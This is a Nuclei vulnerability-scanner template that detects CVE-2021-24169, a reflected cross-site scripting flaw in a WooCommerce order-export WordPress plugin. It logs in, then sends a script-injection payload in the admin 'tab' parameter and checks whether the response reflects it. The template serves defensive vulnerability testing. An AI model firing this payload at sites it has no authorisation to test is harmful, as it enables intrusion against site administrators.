nuclei-templates/cves/2021/CVE-2021-24169.yaml

id: CVE-2021-24169

info:
  name: Advanced Order Export For WooCommerce < 3.1.8 - Authenticated Reflected Cross-Site Scripting (XSS)
  author: r3Y3r53
  severity: medium
  description: |
    This Advanced Order Export For WooCommerce WordPress plugin before 3.1.8 helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to reflected XSS.
  reference:
    - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3
    - https://www.exploit-db.com/exploits/50324
    - https://wordpress.org/plugins/woo-order-export-lite/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24169
  remediation: Fixed in version 3.1.8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24169
    cwe-id: CWE-79
  metadata:
    verified: "true"
  tags: wordpress,authenticated,wpscan,cve,cve2021,xss,wp-plugin,wp,woo-order-export-lite,edb

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<script>alert(document.domain)</script>")'
          - 'contains(body_2, "woo-order-export-lite")'
        condition: and